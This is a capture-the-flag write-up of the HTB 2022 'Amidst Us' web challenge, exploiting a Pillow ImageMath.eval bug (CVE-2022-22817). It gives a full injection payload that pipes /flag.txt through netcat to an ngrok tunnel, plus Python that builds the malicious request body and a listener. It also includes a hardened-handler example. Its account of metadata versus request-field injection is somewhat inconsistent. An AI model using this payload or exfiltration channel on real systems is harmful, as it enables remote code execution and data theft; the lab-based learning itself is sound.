Amidst Us — HTB Cyber Apocalypse CTF 2022

Brandon Wilson
May 26, 2022


Credit: HacktheBox

Summary:

Amidst Us was an easy, white-box web challenge from the 2022 HacktheBox Cyber Apocalypse CTF. My team retrieved the flag by exploiting CVE-2022-22817, an arbitrary-expression evaluation bug in the ImageMath module of Pillow 8.4.0, to run a shell command on the server.

You wouldn’t download and run an application from a sketchy website, would you? Well, we’re going to get this web page to do something very similar.

Challenge Description:

Taken directly from the website — “The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?”

Initial Reconnaissance:

We check the website for user interaction.

We can upload a file

If we click the fluorescent UFO it prompts us to upload a file, and if we upload a picture it replaces one of the characters on the public web page with whatever we uploaded.

How sus…

Next, let’s check the source code.

The web page is hardcoded to use Pillow version 8.4.0

Pillow is the actively maintained fork of the Python Imaging Library, and the version pinned here predates a security fix: in releases before 9.0.0, ImageMath.eval() handed its expression string to Python’s own eval() with the full set of builtins reachable, and 9.0.1 tightened the restriction further after the first fix turned out to be incomplete. Checking known CVEs for 8.4.0 turns up CVE-2022-22817, which describes exactly that: arbitrary Python expressions, including ones that reach __import__ or exec, can be evaluated through ImageMath.eval(). If the web page passes anything we control into that call, we can run our own code on the server and make the page do anything we want.

Some of the meta tags that make up metadata

Let’s see if we can inject a command by uploading a picture with altered metadata; exiftool can read and rewrite it. Metadata is simply data describing other data, which is useful for organizing the data it belongs to. A photo carries many potential data points, including, but not limited to, the file name, the time and date the photo was taken, and the time and date it was last modified. These data points are called “meta tags”, or just tags.

Proof of Concept:

We craft a test payload

We put an intercepting proxy between us and the web page to capture, and edit, every request and response we send or receive. Burp Suite works well for this, and it lets us see exactly how the backend reacts to our altered photo. Working on a copy of the image, we changed the filename tag, because the other tags we tried are rejected (several only accept floating-point numbers). We upload the altered picture, the page updates because of the upload, and we capture the request and the response in Burp.

Screenshot of Burp Suite: Well well well…

The first ‘255’ has been replaced.

The upload goes through ImageMath.eval(), the vulnerable method!

The front end base64-encodes the uploaded image and sends it to the backend, which decodes it and runs it through the vulnerable method, ImageMath.eval(), before placing the result on the page. The rest of the processing does not matter: every uploaded picture is handled on the backend and published on the external web page for all the world to see, and one of the processing steps feeds data from our request into the call we researched earlier. The first ‘255’ in the captured request is the value we will replace.
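To make the CVE-2022-22817 pattern from the research section and the request handling just described concrete, here is an added example that models both sides: a handler that formats request values straight into an expression and hands it to an unrestricted eval(), next to a hardened handler that validates the colour list and only evaluates a name-checked expression. This is a stand-in written for this writeup, not Pillow’s code and not the challenge’s own source; the JSON body shape (a base64 image plus a three-element background colour list) is an assumption, and the injected expression is a harmless call into the os module rather than the real os.system() payload.

```python
"""Model of the CVE-2022-22817 pattern behind the challenge: attacker-controlled text
is spliced into an expression string that reaches an eval() with unrestricted builtins.
Added example; a stand-in, not Pillow's code and not the challenge's own handler."""

import builtins
import json

# Constructed request bodies. The shape (base64 image plus a three-element background
# colour list) is an assumption about the challenge front end; the writeup only shows
# that the first 255 in the request is the injection point.
BENIGN_BODY = json.dumps({"image": "iVBORw0KGgo=", "background": [255, 255, 255]})
# Harmless stand-in for the real payload: proves __import__ is reachable without
# running a shell command. len(os.sep) is 1 on every platform.
ATTACK_BODY = json.dumps({
    "image": "iVBORw0KGgo=",
    "background": ["len(__import__('os').sep)", 255, 255],
})


def eval_like_pillow_8(expression, namespace):
    """Mimics what made ImageMath.eval exploitable before Pillow 9.0.0: the expression
    goes to the builtin eval() with a globals dict that does not define __builtins__,
    so Python fills in the full builtins module, including __import__."""
    return builtins.eval(expression, dict(namespace))


def vulnerable_handler(body):
    """Assumed shape of the challenge handler: colour components are formatted straight
    into the expression text, so a string in the list becomes code."""
    r, g, b = json.loads(body).get("background", [255, 255, 255])
    expression = f"({r} + {g} + {b}) // 3"
    return eval_like_pillow_8(expression, {})


ALLOWED_NAMES = {"abs", "min", "max"}


def safe_eval(expression, namespace):
    """Compile first, refuse any name that is not a known operand or an allowlisted
    function, then evaluate with only those builtins. Attribute names land in co_names
    too, so x.__class__ is refused as well. Same idea as the name check Pillow added
    to ImageMath.eval in 9.0.1."""
    code = compile(expression, "<expression>", "eval")
    for name in code.co_names:
        if name not in namespace and name not in ALLOWED_NAMES:
            raise ValueError(f"name {name!r} not allowed in expression")
    safe_globals = {"__builtins__": {n: getattr(builtins, n) for n in ALLOWED_NAMES}}
    return builtins.eval(code, safe_globals, dict(namespace))


def hardened_handler(body):
    """Validate the data before it gets anywhere near an expression: exactly three
    plain ints in 0..255 (bool is rejected too, since it subclasses int)."""
    background = json.loads(body).get("background", [255, 255, 255])
    if not (isinstance(background, list) and len(background) == 3
            and all(type(c) is int and 0 <= c <= 255 for c in background)):
        raise ValueError("background must be three integers in the range 0..255")
    r, g, b = background
    return safe_eval(f"({r} + {g} + {b}) // 3", {})


def is_rejected(handler, body):
    """True if the handler refuses the body instead of evaluating it."""
    try:
        handler(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, benign body:", vulnerable_handler(BENIGN_BODY))   # 255
    print("vulnerable, attack body:", vulnerable_handler(ATTACK_BODY))   # 170: __import__ ran
    print("hardened, benign body:  ", hardened_handler(BENIGN_BODY))     # 255
    print("hardened rejects attack:", is_rejected(hardened_handler, ATTACK_BODY))  # True
```

The point of the hardened version is the order of operations: the input is checked for type and range before any expression exists, and the name check on the compiled code is a second layer, not a sandbox. An eval() with an emptied __builtins__ on its own is not a security boundary, which is why Pillow needed a follow-up release.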

Payload Crafting:

With code execution, we still need a way to get the flag out. netcat can push the content of /flag.txt over a TCP connection: we start a netcat listener on our machine and expose it through an ngrok TCP tunnel, so the challenge box connects to the public ngrok address and the tunnel forwards the bytes to our listener, where they sit in the terminal until we read them. The expression that replaces the first ‘255’ is:

"__import__('os').system('cat /flag.txt | nc <url>.ngrok.io <port>')"

where <url> and <port> are the host and port ngrok reports for the tunnel.
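The two halves of that step, building the request body with the injected expression and catching what the victim sends back, as an added example that is not part of the original writeup. The ngrok hostname and port are placeholders, the request shape is the same assumption as before (the injected string takes the first background colour slot), and the victim side is simulated by a plain socket write over loopback instead of actually running `cat /flag.txt | nc` on a remote box.

```python
"""Payload assembly and a catcher for the exfiltration channel used in the writeup.
Added example; the ngrok hostname, port and request shape are assumptions, and the
victim side is simulated over loopback instead of running `cat /flag.txt | nc`."""

import json
import socket
import threading


def build_exfil_body(image_b64, host, port, flag_path="/flag.txt"):
    """Same injection as the writeup's payload: os.system() wrapped in the string that
    replaces the first background colour component. host/port belong to the catcher."""
    cmd = f"cat {flag_path} | nc {host} {port}"
    injected = f"__import__('os').system({cmd!r})"
    return json.dumps({"image": image_b64, "background": [injected, 255, 255]})


class Catcher:
    """Stand-in for `nc -lvnp <port>` behind an `ngrok tcp <port>` tunnel: accepts one
    connection on loopback and keeps whatever the connecting side sends."""

    def __init__(self):
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
        self._sock.listen(1)
        self.port = self._sock.getsockname()[1]
        self.received = b""
        self._done = threading.Event()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self._sock.accept()
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:          # sender closed its side: transfer complete
                    break
                self.received += chunk
        self._sock.close()
        self._done.set()

    def wait(self, timeout=5.0):
        """Block until the sender closes its side (or the timeout) and return the bytes."""
        self._done.wait(timeout)
        return self.received


def send_like_nc(host, port, data):
    """What `cat file | nc host port` does on the wire: connect, write, close."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(data)


def run_demo(flag=b"HTB{constructed_example_flag}\n"):
    """Start a catcher, 'exfiltrate' a constructed flag to it, and return what arrived."""
    catcher = Catcher()
    send_like_nc("127.0.0.1", catcher.port, flag)
    return catcher.wait()


if __name__ == "__main__":
    # Placeholder tunnel address; ngrok prints the real host and port when the tunnel is up.
    print(build_exfil_body("iVBORw0KGgo=", "example.ngrok.io", 12345))
    print(run_demo())
```

In the real attack the body from build_exfil_body() is what gets replayed through Burp, and the catcher is simply `nc -lvnp <port>` in a terminal; the Catcher class only exists so the channel can be exercised end to end without a tunnel.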

Flag:

HTB{i_slept_my_way_to_rce}

Conclusion:

The path itself was straightforward but it took quite a bit of troubleshooting to get right. Overall, a really satisfying challenge. Thanks for reading!


Brandon Wilson

I’m an aspiring security researcher who writes on information security topics.